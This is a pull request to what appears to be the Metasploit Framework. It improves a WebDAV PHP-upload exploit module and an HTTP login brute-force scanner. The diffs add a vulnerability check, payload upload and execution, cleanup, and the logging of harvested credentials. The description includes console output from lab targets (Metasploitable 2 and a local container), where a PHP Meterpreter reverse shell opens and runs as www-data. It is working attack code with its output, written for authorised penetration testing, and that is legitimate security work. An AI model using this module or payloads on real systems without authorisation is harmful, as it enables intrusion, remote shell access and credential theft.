### PR TITLE
WebDAV improvements

### DIFF
--- a/modules/auxiliary/scanner/http/http_login.rb
+++ b/modules/auxiliary/scanner/http/http_login.rb
@@ -16,7 +16,12 @@ class MetasploitModule < Msf::Auxiliary
   def initialize
     super(
       'Name' => 'HTTP Login Utility',
-      'Description' => 'This module attempts to authenticate to an HTTP service.',
+      'Description' => %q{
+        This module attempts to authenticate to HTTP services that
+        require Basic, Digest, or WebDAV authentication.
+        It will probe URIs to identify endpoints requiring authentication (HTTP 401)
+        and then perform brute-force the login.
+      },
       'Author' => [ 'hdm' ],
       'References' => [
         [ 'CVE', '1999-0502'] # Weak password

--- a/modules/auxiliary/scanner/http/http_login.rb
+++ b/modules/auxiliary/scanner/http/http_login.rb
@@ -20,7 +20,7 @@ class MetasploitModule < Msf::Auxiliary
         This module attempts to authenticate to HTTP services that
         require Basic, Digest, or WebDAV authentication.
         It will probe URIs to identify endpoints requiring authentication (HTTP 401)
-        and then perform brute-force the login.
+        and then perform brute-force login attempts.
       },
       'Author' => [ 'hdm' ],
       'References' => [

--- a/modules/auxiliary/scanner/http/http_login.rb
+++ b/modules/auxiliary/scanner/http/http_login.rb
@@ -129,7 +129,7 @@ class MetasploitModule < Msf::Auxiliary
 
   def target_url
     proto = 'http'
-    if rport == 443 or ssl
+    if (rport == 443) || ssl
       proto = 'https'
     end
     "#{proto}://#{vhost}:#{rport}#{@uri}"
@@ -225,14 +225,14 @@ class MetasploitModule < Msf::Auxiliary
         int_start = code_parts[0].to_i
         int_end = code_parts[1].to_i
         unless int_start > 0 && int_end > 0
-          raise ArgumentError.new("#{code} is not a valid response code range.")
+          raise ArgumentError, "#{code} is not a valid response code range."
         end
 
         codes.append(*(int_start..int_end))
       else
         int_code = code.to_i
         unless int_code > 0
-          raise ArgumentError.new("#{code} is not a valid response code.")
+          raise ArgumentError, "#{code} is not a valid response code."
         end
 
         codes << int_code

--- a/modules/exploits/multi/http/webdav_upload_php.rb
+++ b/modules/exploits/multi/http/webdav_upload_php.rb
@@ -9,6 +9,7 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::EXE
   include Msf::Exploit::FileDropper
+  prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::Deprecated
   moved_from 'exploits/windows/http/xampp_webdav_upload_php'
 
@@ -44,8 +45,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
-        OptString.new('URI', [ true, 'The path to attempt to upload', '/webdav/']),
-        OptString.new('FILENAME', [ false, 'The filename to give the payload. (Leave blank for random)']),
+        OptString.new('URI', [ true, 'The URI path to attempt to upload', '/webdav/' ]),
+        OptString.new('FILENAME', [ false, 'The filename to give the payload. (Leave blank for random)' ]),
         OptString.new('USERNAME', [ false, 'The HTTP username to specify for authentication', 'wampp' ]),
         OptString.new('PASSWORD', [ false, 'The HTTP password to specify for authentication', 'xampp' ])
       ]
@@ -136,6 +137,84 @@ class MetasploitModule < Msf::Exploit::Remote
     }.merge service_data
 
     create_credential_login login_data
+  end
+
+  def check
+    test_file = rand_text_alphanumeric(rand(8..15)) + '.php'
+    test_url = normalize_uri(datastore['URI'], test_file)
+    payload = rand_text_alphanumeric(rand(8..15))
+    res_creds = build_res_creds
+
+    # Check
+    vprint_status "Checking for WebDAV: #{datastore['URI']}"
+    res = send_request_raw({
+      'uri' => normalize_uri(datastore['URI']),
+      'method' => 'OPTIONS'
+    }.merge(res_creds), 10)
+    return Exploit::CheckCode::Unknown unless res
+
+    unless res.code == 200
+      print_error "Target responded: HTTP #{res.code}, should be 200"
+      print_res_code(res, res_creds)
+      return Exploit::CheckCode::Unknown
+    end
+
+    # Record results!
+    report_webdav_service(res, res_creds)
+
+    # First see if it already exists (it really shouldn't)
+    vprint_status("Checking for test file: #{test_url}")
+    res = send_request_raw({
+      'uri' => test_url
+    }.merge(res_creds), 10)
+    return Exploit::CheckCode::Unknown unless res
+
+    unless res.code == 404
+      print_error("The test file may already exists (HTTP #{res.code})")
+      return Exploit::CheckCode::Unknown # Need to try again with a different file
+    end
+
+    # Try to create it
+    vprint_status("Attempting to upload: #{test_url}")
+    res = send_request_cgi({
+      'uri' => test_url,
+      'method' => 'PUT',
+      'data' => payload
+    }.merge(res_creds), 10)
+    return Exploit::CheckCode::Unknown unless res
+
+    unless res.code == 201
+      print_error("Error with upload request (HTTP #{res.code}, should be 201)")
+      print_res_code(res, res_creds)
+      return Exploit::CheckCode::Safe
+    end
+
+    # Try to run it
+    vprint_status("Checking if created: #{test_url}")
+    res = send_request_cgi({
+      'uri' => test_url
+    }.merge(res_creds))
+    return Exploit::CheckCode::Unknown unless res
+
+    unless res.code.to_i.between?(200, 299)
+      print_error("Error with exploit request (HTTP #{res.code}, should be 2xx)")
+      print_error("Error with exploit request (Response doesn't match payload) - Missing PHP?") unless res.body.match(payload)
+      return Exploit::CheckCode::Safe
+    end
+
+    # Clean up
+    vprint_status("Attempting to delete: #{test_url}")
+    res = send_request_cgi({
+      'uri' => test_url,
+      'method' => 'DELETE'
+    }.merge(res_creds), 10)
+    return Exploit::CheckCode::Unknown unless res
+
+    # Exploit uses cmd to delete via file system, not HTTP DELETE request
+    print_warning("Error with delete request (HTTP #{res.code}, should be 204) - Can't clean up") unless res.code == 204
+
+    # Done
+    return Exploit::CheckCode::Vulnerable
   end
 
   def exploit

--- a/modules/exploits/multi/http/webdav_upload_php.rb
+++ b/modules/exploits/multi/http/webdav_upload_php.rb
@@ -8,6 +8,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
   include Msf::Exploit::Deprecated
   moved_from 'exploits/windows/http/xampp_webdav_upload_php'
 
@@ -70,18 +71,18 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => uri,
       'method' => 'GET'
     }, 20)
+
+    register_file_for_cleanup(@backdoor)
   end
 
   def build_path
     uri_path = normalize_uri(datastore['URI'])
     uri_path << '/' unless uri_path.ends_with?('/')
-    if datastore['FILENAME']
-      uri_path << datastore['FILENAME']
-      uri_path << '.php' unless uri_path.ends_with?('.php')
-    else
-      uri_path << Rex::Text.rand_text_alphanumeric(7)
-      uri_path << '.php'
-    end
+
+    @backdoor = datastore['FILENAME'] || Rex::Text.rand_text_alphanumeric(7)
+    @backdoor << '.php' unless @backdoor.end_with?('.php')
+    uri_path << @backdoor
+
     return uri_path
   end
 end

--- a/modules/exploits/multi/http/webdav_upload_php.rb
+++ b/modules/exploits/multi/http/webdav_upload_php.rb
@@ -150,6 +150,14 @@ class MetasploitModule < Msf::Exploit::Remote
     }.merge(res_creds), 10)
     unless (res && (res.code == 201))
       print_error 'Failed to upload file!'
+
+      if res
+        print_error("Error with upload request (HTTP #{res.code}, should be 201)")
+        print_res_code(res, res_creds)
+      else
+        print_error('No response received from server')
+      end
+
       return
     end
 

--- a/modules/exploits/multi/http/webdav_upload_php.rb
+++ b/modules/exploits/multi/http/webdav_upload_php.rb
@@ -31,7 +31,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'Targets' => [
         [ 'Automatic', {} ],
       ],
-      'DisclosureDate' => 'Jan 14 2012',
+      'DisclosureDate' => '2012-01-14',
       'DefaultTarget' => 0,
       'References' => [
         [ 'CVE', '2012-10062' ]
@@ -68,8 +68,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def print_res_code(res, res_creds)
     if res.code == 401
-      print_warning('Creds may be required') if res_creds.empty?
-      print_warning('Creds may be incorrect') if !res_creds.empty?
+      print_warning 'Creds may be required' if res_creds.empty?
+      print_warning 'Creds may be incorrect'  if !res_creds.empty?
     end
   end
 
@@ -163,19 +163,19 @@ class MetasploitModule < Msf::Exploit::Remote
     report_webdav_service(res, res_creds)
 
     # First see if it already exists (it really shouldn't)
-    vprint_status("Checking for test file: #{test_url}")
+    vprint_status "Checking for test file: #{test_url}"
     res = send_request_raw({
       'uri' => test_url
     }.merge(res_creds), 10)
     return Exploit::CheckCode::Unknown unless res
 
     unless res.code == 404
-      print_error("The test file may already exists (HTTP #{res.code})")
+      print_error "The test file may already exists (HTTP #{res.code})"
       return Exploit::CheckCode::Unknown # Need to try again with a different file
     end
 
     # Try to create it
-    vprint_status("Attempting to upload: #{test_url}")
+    vprint_status "Attempting to upload: #{test_url}"
     res = send_request_cgi({
       'uri' => test_url,
       'method' => 'PUT',
@@ -184,26 +184,26 @@ class MetasploitModule < Msf::Exploit::Remote
     return Exploit::CheckCode::Unknown unless res
 
     unless res.code == 201
-      print_error("Error with upload request (HTTP #{res.code}, should be 201)")
+      print_error "Error with upload request (HTTP #{res.code}, should be 201)"
       print_res_code(res, res_creds)
       return Exploit::CheckCode::Safe
     end
 
     # Try to run it
-    vprint_status("Checking if created: #{test_url}")
+    vprint_status "Checking if created: #{test_url}"
     res = send_request_cgi({
       'uri' => test_url
     }.merge(res_creds))
     return Exploit::CheckCode::Unknown unless res
 
     unless res.code.to_i.between?(200, 299)
-      print_error("Error with exploit request (HTTP #{res.code}, should be 2xx)")
-      print_error("Error with exploit request (Response doesn't match payload) - Missing PHP?") unless res.body.match(payload)
+      print_error "Error with exploit request (HTTP #{res.code}, should be 2xx)"
+      print_error "Error with exploit request (Response doesn't match payload) - Missing PHP?" unless res.body.match(payload)
       return Exploit::CheckCode::Safe
     end
 
     # Clean up
-    vprint_status("Attempting to delete: #{test_url}")
+    vprint_status "Attempting to delete: #{test_url}"
     res = send_request_cgi({
       'uri' => test_url,
       'method' => 'DELETE'
@@ -211,7 +211,7 @@ class MetasploitModule < Msf::Exploit::Remote
     return Exploit::CheckCode::Unknown unless res
 
     # Exploit uses cmd to delete via file system, not HTTP DELETE request
-    print_warning("Error with delete request (HTTP #{res.code}, should be 204) - Can't clean up") unless res.code == 204
+    print_warning "Error with delete request (HTTP #{res.code}, should be 204) - Can't clean up" unless res.code == 204
 
     # Done
     return Exploit::CheckCode::Vulnerable
@@ -231,10 +231,10 @@ class MetasploitModule < Msf::Exploit::Remote
       print_error 'Failed to upload file!'
 
       if res
-        print_error("Error with upload request (HTTP #{res.code}, should be 201)")
+        print_error "Error with upload request (HTTP #{res.code}, should be 201)"
         print_res_code(res, res_creds)
       else
-        print_error('No response received from server')
+        print_error 'No response received from server'
       end
 
       return

--- a/modules/exploits/multi/http/webdav_upload_php.rb
+++ b/modules/exploits/multi/http/webdav_upload_php.rb
@@ -52,8 +52,89 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
+  def build_res_creds
+    if !datastore['USERNAME'].to_s.empty?
+      vprint_status 'Using credentials for WebDAV'
+      {
+        'username' => datastore['USERNAME'],
+        'password' => datastore['PASSWORD']
+      }
+    else
+      vprint_status 'Anonymous authentication for WebDAV'
+      {}
+    end
+  end
+
+  def report_webdav_service(res, creds)
+    header_server = res.headers['Server']
+    vprint_status "Server: #{header_server.strip}"
+
+    opts = {
+      ip: rhost,
+      port: rport,
+      service_name: 'webdav',
+      proto: 'tcp',
+      proof: res.code.to_s
+    }.merge(creds.transform_keys(&:to_sym))
+
+    service = report_service(
+      host: opts[:ip],
+      port: opts[:port],
+      proto: opts[:proto],
+      name: opts[:service_name],
+      info: header_server,
+      parents: {
+        name: ssl ? 'https' : 'http',
+        host: opts[:ip],
+        port: opts[:port],
+        proto: opts[:proto],
+        parents: {
+          name: 'tcp',
+          host: opts[:ip],
+          port: opts[:port],
+          proto: opts[:proto],
+          parents: nil
+        }
+      }
+    )
+
+    # XXXX Otherwise `vuln`'s "Service" is "none" when doing check(), and different when doing exploit()
+    report_vuln(
+      host: opts[:ip],
+      service: service,
+      name: name
+    )
+
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: opts[:proto],
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:username],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge service_data
+
+    login_data = {
+      last_attempted_at: DateTime.now,
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      proof: opts[:proof]
+    }.merge service_data
+
+    create_credential_login login_data
+  end
+
   def exploit
     uri = build_path
+    res_creds = build_res_creds
+
     print_status "Uploading payload: #{uri}"
     res = send_request_cgi({
       'uri' => uri,
@@ -66,6 +147,9 @@ class MetasploitModule < Msf::Exploit::Remote
       print_error 'Failed to upload file!'
       return
     end
+
+    report_webdav_service(res, res_creds)
+
     print_status 'Attempting to execute payload'
     send_request_cgi({
       'uri' => uri,

--- a/modules/exploits/multi/http/webdav_upload_php.rb
+++ b/modules/exploits/multi/http/webdav_upload_php.rb
@@ -20,7 +20,10 @@ class MetasploitModule < Msf::Exploit::Remote
           It uses supplied credentials to upload a PHP payload and
           execute it.
       },
-      'Author' => ['theLightCosine'],
+      'Author' => [
+        'theLightCosine',
+        'g0tmi1k' # @g0tmi1k // https://blog.g0tmi1k.com/ - additional features
+      ],
       'Platform' => 'php',
       'Arch' => ARCH_PHP,
       'Targets' => [
@@ -35,13 +38,13 @@ class MetasploitModule < Msf::Exploit::Remote
         'Stability' => [CRASH_SAFE],
         'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
         'Reliability' => [REPEATABLE_SESSION]
-       }
+      }
     )
 
     register_options(
       [
-        OptString.new('PATH', [ true, "The path to attempt to upload", '/webdav/']),
-        OptString.new('FILENAME', [ false, "The filename to give the payload. (Leave Blank for Random)"]),
+        OptString.new('PATH', [ true, 'The path to attempt to upload', '/webdav/']),
+        OptString.new('FILENAME', [ false, 'The filename to give the payload. (Leave blank for random)']),
         OptString.new('USERNAME', [true, 'The HTTP username to specify for authentication', 'wampp']),
         OptString.new('PASSWORD', [true, 'The HTTP password to specify for authentication', 'xampp'])
       ]
@@ -50,20 +53,20 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     uri = build_path
-    print_status "Uploading Payload to #{uri}"
+    print_status "Uploading payload: #{uri}"
     res = send_request_cgi({
       'uri' => uri,
       'method' => 'PUT',
-      'data'	=> payload.raw,
+      'data' => payload.raw,
       'username' => datastore['USERNAME'],
       'password' => datastore['PASSWORD']
     }, 25)
-    unless (res and res.code == 201)
-      print_error "Failed to upload file!"
+    unless (res && (res.code == 201))
+      print_error 'Failed to upload file!'
       return
     end
-    print_status "Attempting to execute Payload"
-    res = send_request_cgi({
+    print_status 'Attempting to execute payload'
+    send_request_cgi({
       'uri' => uri,
       'method' => 'GET'
     }, 20)

--- a/modules/exploits/multi/http/webdav_upload_php.rb
+++ b/modules/exploits/multi/http/webdav_upload_php.rb
@@ -43,7 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
-        OptString.new('PATH', [ true, 'The path to attempt to upload', '/webdav/']),
+        OptString.new('URI', [ true, 'The path to attempt to upload', '/webdav/']),
         OptString.new('FILENAME', [ false, 'The filename to give the payload. (Leave blank for random)']),
         OptString.new('USERNAME', [true, 'The HTTP username to specify for authentication', 'wampp']),
         OptString.new('PASSWORD', [true, 'The HTTP password to specify for authentication', 'xampp'])
@@ -73,7 +73,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def build_path
-    uri_path = normalize_uri(datastore['PATH'])
+    uri_path = normalize_uri(datastore['URI'])
     uri_path << '/' unless uri_path.ends_with?('/')
     if datastore['FILENAME']
       uri_path << datastore['FILENAME']

--- a/modules/exploits/multi/http/webdav_upload_php.rb
+++ b/modules/exploits/multi/http/webdav_upload_php.rb
@@ -8,12 +8,15 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::EXE
+  include Msf::Exploit::Deprecated
+  moved_from 'exploits/windows/http/xampp_webdav_upload_php'
 
   def initialize
     super(
-      'Name' => 'XAMPP WebDAV PHP Upload',
+      'Name' => 'WebDAV PHP Upload',
       'Description' => %q{
-          This module exploits weak WebDAV passwords on XAMPP servers.
+          This module exploits weak WebDAV passwords, which may be
+          on a on XAMPP server.
           It uses supplied credentials to upload a PHP payload and
           execute it.
       },

--- a/modules/exploits/multi/http/webdav_upload_php.rb
+++ b/modules/exploits/multi/http/webdav_upload_php.rb
@@ -13,14 +13,14 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Deprecated
   moved_from 'exploits/windows/http/xampp_webdav_upload_php'
 
-  def initialize
+  def initialize(_info = {})
     super(
       'Name' => 'WebDAV PHP Upload',
       'Description' => %q{
-          This module exploits weak WebDAV passwords, which may be
-          on a on XAMPP server.
-          It uses supplied credentials to upload a PHP payload and
-          execute it.
+          This module exploits WebDAV which also has PHP enabled,
+          such as found on XAMPP servers.
+          It can use do by using any supplied credentials to upload via WebDAV,
+          a PHP payload and then execute it.
       },
       'Author' => [
         'theLightCosine',
@@ -69,13 +69,13 @@ class MetasploitModule < Msf::Exploit::Remote
   def print_res_code(res, res_creds)
     if res.code == 401
       print_warning 'Creds may be required' if res_creds.empty?
-      print_warning 'Creds may be incorrect'  if !res_creds.empty?
+      print_warning 'Creds may be incorrect' if !res_creds.empty?
     end
   end
 
   def report_webdav_service(res, creds)
-    header_server = res.headers['Server']
-    vprint_status "Server: #{header_server.strip}"
+    header_server = res.headers['Server'].to_s.strip
+    vprint_status "Server: #{header_server}"
 
     opts = {
       ip: rhost,
@@ -106,6 +106,10 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     )
 
+    [opts, service]
+  end
+
+  def report_webdav_creds(opts, service)
     # XXXX Otherwise `vuln`'s "Service" is "none" when doing check(), and different when doing exploit()
     report_vuln(
       host: opts[:ip],
@@ -160,7 +164,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     # Record results!
-    report_webdav_service(res, res_creds)
+    opts, service = report_webdav_service(res, res_creds)
 
     # First see if it already exists (it really shouldn't)
     vprint_status "Checking for test file: #{test_url}"
@@ -168,11 +172,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => test_url
     }.merge(res_creds), 10)
     return Exploit::CheckCode::Unknown unless res
-
-    unless res.code == 404
-      print_error "The test file may already exists (HTTP #{res.code})"
-      return Exploit::CheckCode::Unknown # Need to try again with a different file
-    end
+    return Exploit::CheckCode::Unknown("The test file may already exists (HTTP #{res.code})") unless res.code == 404 # Need to try again with a different file
 
     # Try to create it
     vprint_status "Attempting to upload: #{test_url}"
@@ -183,11 +183,15 @@ class MetasploitModule < Msf::Exploit::Remote
     }.merge(res_creds), 10)
     return Exploit::CheckCode::Unknown unless res
 
-    unless res.code == 201
-      print_error "Error with upload request (HTTP #{res.code}, should be 201)"
+    ## Often its HTTP 201
+    unless res.code.to_i.between?(200, 299)
+      print_error "Error with upload request (HTTP #{res.code}, should be 2xx)"
       print_res_code(res, res_creds)
       return Exploit::CheckCode::Safe
     end
+
+    # Record results!
+    report_webdav_creds(opts, service)
 
     # Try to run it
     vprint_status "Checking if created: #{test_url}"
@@ -195,12 +199,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => test_url
     }.merge(res_creds))
     return Exploit::CheckCode::Unknown unless res
-
-    unless res.code.to_i.between?(200, 299)
-      print_error "Error with exploit request (HTTP #{res.code}, should be 2xx)"
-      print_error "Error with exploit request (Response doesn't match payload) - Missing PHP?" unless res.body.match(payload)
-      return Exploit::CheckCode::Safe
-    end
+    return Exploit::CheckCode::Safe("Error with exploit request (HTTP #{res.code}, should be 2xx)") unless res.code.to_i.between?(200, 299)
+    return Exploit::CheckCode::Safe("Error with exploit request (Response doesn't match payload) - Missing PHP?") unless res.body.to_s.include?(payload)
 
     # Clean up
     vprint_status "Attempting to delete: #{test_url}"
@@ -227,11 +227,12 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'PUT',
       'data' => payload.raw
     }.merge(res_creds), 10)
-    unless (res && (res.code == 201))
+    ## Often its HTTP 201
+    unless res&.code&.between?(200, 299)
       print_error 'Failed to upload file!'
 
       if res
-        print_error "Error with upload request (HTTP #{res.code}, should be 201)"
+        print_error "Error with upload request (HTTP #{res.code}, should be 2xx)"
         print_res_code(res, res_creds)
       else
         print_error 'No response received from server'
@@ -240,7 +241,9 @@ class MetasploitModule < Msf::Exploit::Remote
       return
     end
 
-    report_webdav_service(res, res_creds)
+    # Record results!
+    opts, service = report_webdav_service(res, res_creds)
+    report_webdav_creds(opts, service)
 
     print_status 'Attempting to execute payload'
     # Very short timeout because the request may never return if we're sending a socket payload

--- a/modules/exploits/multi/http/webdav_upload_php.rb
+++ b/modules/exploits/multi/http/webdav_upload_php.rb
@@ -46,8 +46,8 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         OptString.new('URI', [ true, 'The path to attempt to upload', '/webdav/']),
         OptString.new('FILENAME', [ false, 'The filename to give the payload. (Leave blank for random)']),
-        OptString.new('USERNAME', [true, 'The HTTP username to specify for authentication', 'wampp']),
-        OptString.new('PASSWORD', [true, 'The HTTP password to specify for authentication', 'xampp'])
+        OptString.new('USERNAME', [ false, 'The HTTP username to specify for authentication', 'wampp' ]),
+        OptString.new('PASSWORD', [ false, 'The HTTP password to specify for authentication', 'xampp' ])
       ]
     )
   end
@@ -62,6 +62,13 @@ class MetasploitModule < Msf::Exploit::Remote
     else
       vprint_status 'Anonymous authentication for WebDAV'
       {}
+    end
+  end
+
+  def print_res_code(res, res_creds)
+    if res.code == 401
+      print_warning('Creds may be required') if res_creds.empty?
+      print_warning('Creds may be incorrect') if !res_creds.empty?
     end
   end
 
@@ -139,10 +146,8 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_cgi({
       'uri' => uri,
       'method' => 'PUT',
-      'data' => payload.raw,
-      'username' => datastore['USERNAME'],
-      'password' => datastore['PASSWORD']
-    }, 25)
+      'data' => payload.raw
+    }.merge(res_creds), 10)
     unless (res && (res.code == 201))
       print_error 'Failed to upload file!'
       return
@@ -151,10 +156,11 @@ class MetasploitModule < Msf::Exploit::Remote
     report_webdav_service(res, res_creds)
 
     print_status 'Attempting to execute payload'
+    # Very short timeout because the request may never return if we're sending a socket payload
     send_request_cgi({
       'uri' => uri,
       'method' => 'GET'
-    }, 20)
+    }.merge(res_creds), 0.01)
 
     register_file_for_cleanup(@backdoor)
   end


### PR DESCRIPTION
Improvements: 

- [x] WebDAV isn't just for Windows, Yes, XAMP is - however, this module works out of the box with Linux too!
- [x] Add check() function
- [x] Able to clean up after exploiting (deletes the uploaded .php file)
- [x] Able to update workspace (services, vulns, creds etc)
  - check() vs exploit() gets duplicated up slightly with `vulns` - and not sure how to fix it.
- [x] Able to being anonymous/unauthenticated
- [x] Code cleanup

- - - 


## Metasploitable 2

```console
$ git pull
[...]
$
$ ./msfconsole -q -x 'db_connect -y /usr/share/metasploit-framework/config/database.yml; db_status; workspace -D;
setg VERBOSE true;
setg RHOSTS 10.0.0.10; setg LHOST tap0;
use exploit/multi/http/webdav_upload_php;
set --clear username;
set URI /dav/;
options;
check; exploit'
[*] Connected to the database specified in the YAML file
[*] Connected to msf. Connection type: postgresql. Connection name: OYGIkFxA.
[*] Deleted workspace: default
[*] Recreated the default workspace
VERBOSE => true
RHOSTS => 10.0.0.10
LHOST => tap0
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
username =>
URI => /dav/

Module options (exploit/multi/http/webdav_upload_php):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME                   no        The filename to give the payload. (Leave blank for random)
   PASSWORD  xampp            no        The HTTP password to specify for authentication
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, socks5, socks5h, http
   RHOSTS    10.0.0.10        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT     80               yes       The target port (TCP)
   SSL       false            no        Negotiate SSL/TLS for outgoing connections
   URI       /dav/            yes       The URI path to attempt to upload
   USERNAME                   no        The HTTP username to specify for authentication
   VHOST                      no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  tap0             yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

[*] Anonymous authentication for WebDAV
[*] Checking for WebDAV: /dav/
[*] Server: Apache/2.2.8 (Ubuntu) DAV/2
[*] Checking for test file: /dav/wI7y4i2QCmN.php
[*] Attempting to upload: /dav/wI7y4i2QCmN.php
[*] Checking if created: /dav/wI7y4i2QCmN.php
[*] Attempting to delete: /dav/wI7y4i2QCmN.php
[+] 10.0.0.10:80 - The target is vulnerable.
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] Anonymous authentication for WebDAV
[*] Uploading payload: /dav/cQPPpVL.php
[*] Server: Apache/2.2.8 (Ubuntu) DAV/2
[*] Attempting to execute payload
[*] Sending stage (42137 bytes) to 10.0.0.10
[+] Deleted cQPPpVL.php
[*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.10:36360) at 2026-04-08 16:49:04 +0100

meterpreter >
meterpreter > getuid
Server username: www-data
meterpreter > background
[*] Backgrounding session 1...
msf exploit(multi/http/webdav_upload_php) >
msf exploit(multi/http/webdav_upload_php) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      3         2      1      0      1

msf exploit(multi/http/webdav_upload_php) >
msf exploit(multi/http/webdav_upload_php) > hosts

Hosts
=====

address    mac  name            os_name                                                                         os_flavor  os_sp  purpose  info  comments
-------    ---  ----            -------                                                                         ---------  -----  -------  ----  --------
10.0.0.10       metasploitable  Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686                    server

msf exploit(multi/http/webdav_upload_php) >
msf exploit(multi/http/webdav_upload_php) > services
Services
========

host       port  proto  name    state  info                         resource  parents
----       ----  -----  ----    -----  ----                         --------  -------
10.0.0.10  80    tcp    tcp     open                                {}
10.0.0.10  80    tcp    webdav  open   Apache/2.2.8 (Ubuntu) DAV/2  {}        http (80/tcp)
10.0.0.10  80    tcp    http    open                                {}        tcp (80/tcp)

msf exploit(multi/http/webdav_upload_php) >
msf exploit(multi/http/webdav_upload_php) > vulns

Vulnerabilities
===============

Timestamp                Host       Service          Resource  Name               References
---------                ----       -------          --------  ----               ----------
2026-04-08 15:49:03 UTC  10.0.0.10  webdav (80/tcp)  {}        WebDAV PHP Upload  CVE-2012-10062
2026-04-08 15:49:03 UTC  10.0.0.10  http (80/tcp)    {}        WebDAV PHP Upload  CVE-2012-10062

msf exploit(multi/http/webdav_upload_php) >
msf exploit(multi/http/webdav_upload_php) > creds
Credentials
===========

id  host       origin     service          public  private  realm  private_type    JtR Format  cracked_password
--  ----       ------     -------          ------  -------  -----  ------------    ----------  ----------------
41  10.0.0.10  10.0.0.10  80/tcp (webdav)                          Blank password

msf exploit(multi/http/webdav_upload_php) >
```

- - -

## Container

I then made a container with a few WebDAV configs/setups/envs:

```console
$ docker run -d --rm -p 8080:80 --name apache-webdav registry.gitlab.com/g0tmi1k/apache-webdav-docker:trixie
Unable to find image 'registry.gitlab.com/g0tmi1k/apache-webdav-docker:trixie' locally
trixie: Pulling from g0tmi1k/apache-webdav-docker
[...]
73cd6aa963c36c18c2217cb736c50edd9d68596289fbb92447ae7f1b4ffeb46b
$
$ ./msfconsole -q -x 'db_connect -y /usr/share/metasploit-framework/config/database.yml; db_status; workspace -D;
setg VERBOSE true;
setg RHOSTS 127.0.0.1; setg RPORT 8080; setg LHOST docker0;
use exploit/multi/http/webdav_upload_php;
set --clear username;
set PASSWORD password;
set URI /level0/;
options;'
[*] Connected to the database specified in the YAML file
[*] Connected to msf. Connection type: postgresql. Connection name: OYGIkFxA.
[*] Deleted workspace: default
[*] Recreated the default workspace
VERBOSE => true
RHOSTS => 127.0.0.1
RPORT => 8080
LHOST => docker0
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
username =>
PASSWORD => password
URI => /level0/

Module options (exploit/multi/http/webdav_upload_php):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME                   no        The filename to give the payload. (Leave blank for random)
   PASSWORD  password         no        The HTTP password to specify for authentication
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, socks5, socks5h, http
   RHOSTS    127.0.0.1        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT     8080             yes       The target port (TCP)
   SSL       false            no        Negotiate SSL/TLS for outgoing connections
   URI       /level0/         yes       The URI path to attempt to upload
   USERNAME                   no        The HTTP username to specify for authentication
   VHOST                      no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  docker0          yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf exploit(multi/http/webdav_upload_php) >
msf exploit(multi/http/webdav_upload_php) > check
[*] Anonymous authentication for WebDAV
[*] Checking for WebDAV: /level0/
[*] Server: Apache/2.4.66 (Debian)
[*] Checking for test file: /level0/DAS9HCvol.php
[*] Attempting to upload: /level0/DAS9HCvol.php
[*] Checking if created: /level0/DAS9HCvol.php
[*] Attempting to delete: /level0/DAS9HCvol.php
[+] 127.0.0.1:8080 - The target is vulnerable.
msf exploit(multi/http/webdav_upload_php) >
msf exploit(multi/http/webdav_upload_php) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      3         1      1      0      0

msf exploit(multi/http/webdav_upload_php) >
